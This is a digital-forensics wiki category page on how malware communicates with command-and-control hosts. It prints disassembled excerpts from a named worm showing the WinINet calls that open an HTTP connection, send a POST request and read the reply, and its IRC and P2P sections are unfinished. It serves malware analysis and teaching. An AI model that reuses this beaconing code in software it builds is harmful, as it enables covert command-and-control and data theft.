Category:Digital-Forensics/Computer-Forensics/Communication-Channels
Jump to navigation
Jump to search
| You are here: | Communication Channels
|
Description
Most malware communicate with a remote host for various tasks:
- check if updates are available
- alert the attacker that the host is infected
- receive external commands, synchronize multiple hosts with a Command & Control (C&C) to perform a Denial of Service (DoS) attack
- leak data (e.g. passwords, credit card numbers, network architecture, confidential documents, ...)
Let's review some of these control communication channels.
HTTP
Description
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
Thank you for your comprehension.
Steps
The code below is an extract from Worm:Win32/Autorun.ADZ available for download here.
| Step | Functions | Example |
|---|---|---|
| Create HTTP connection |
.text:00403AF6 push ebx ; dwFlags
.text:00403AF7 push ebx ; lpszProxyBypass
.text:00403AF8 push ebx ; lpszProxy
.text:00403AF9 push 4 ; dwAccessType
.text:00403AFB push offset szAgent ; "74978o6rpp6p19836n17n3p2pq0840o0"
.text:00403B00 call ds:InternetOpenA
.text:00403B06 mov [ebp+158h+var_180], eax
.text:00403B09 cmp eax, ebx
.text:00403B0B jz loc_403C6E
.text:00403B11 push ebx ; dwContext
.text:00403B12 push ebx ; dwFlags
.text:00403B13 push 3 ; dwService
.text:00403B15 push ebx ; lpszPassword
.text:00403B16 push ebx ; lpszUserName
.text:00403B17 push 50h ; nServerPort
.text:00403B19 lea ecx, [ebp+158h+szServerName]
.text:00403B1F push ecx ; lpszServerName
.text:00403B20 push eax ; hInternet
.text:00403B21 call ds:InternetConnectA
| |
| Build HTTP request |
.text:00403B32 push ebx ; dwContext
.text:00403B33 push 8468C200h ; dwFlags
.text:00403B38 push ebx ; lplpszAcceptTypes
.text:00403B39 push ebx ; lpszReferrer
.text:00403B3A push offset szVersion ; "HTTP/1.0"
.text:00403B3F lea ecx, [ebp+158h+szObjectName]
.text:00403B45 push ecx ; lpszObjectName
.text:00403B46 push offset szVerb ; "POST"
.text:00403B4B push eax ; hConnect
.text:00403B4C call ds:HttpOpenRequestA
[SNIP]
.text:00403B69 push 20000000h ; dwModifiers
.text:00403B6E push [ebp+158h+dwHeadersLength] ; dwHeadersLength
.text:00403B71 push eax ; lpszHeaders
.text:00403B72 push [ebp+158h+hInternet] ; hRequest
.text:00403B75 call ds:HttpAddRequestHeadersA
| |
| Send HTTP request |
.text:00403C4F push [ebp+158h+dwOptionalLength] ; dwOptionalLength
.text:00403C52 push edi ; lpOptional
.text:00403C53 push ebx ; dwHeadersLength
.text:00403C54 push ebx ; lpszHeaders
.text:00403C55 push [ebp+158h+hInternet] ; hRequest
.text:00403C58 call ds:HttpSendRequestA
| |
| Read response |
.text:00403FA4 lea ecx, [ebp+148h+dwNumberOfBytesRead]
.text:00403FA7 push ecx ; lpdwNumberOfBytesRead
.text:00403FA8 push [ebp+148h+lpOptional] ; dwNumberOfBytesToRead
.text:00403FAB mov [ebp+148h+lpMem], eax
.text:00403FAE push eax ; lpBuffer
.text:00403FAF push [ebp+148h+hInternet] ; hFile
.text:00403FB2 call ds:InternetReadFile
|
IRC
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
Thank you for your comprehension.
P2P
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
Thank you for your comprehension.
Comments
Pages in this category
Pages in category "Digital-Forensics/Computer-Forensics/Communication-Channels"
The following 10 pages are in this category, out of 10 total.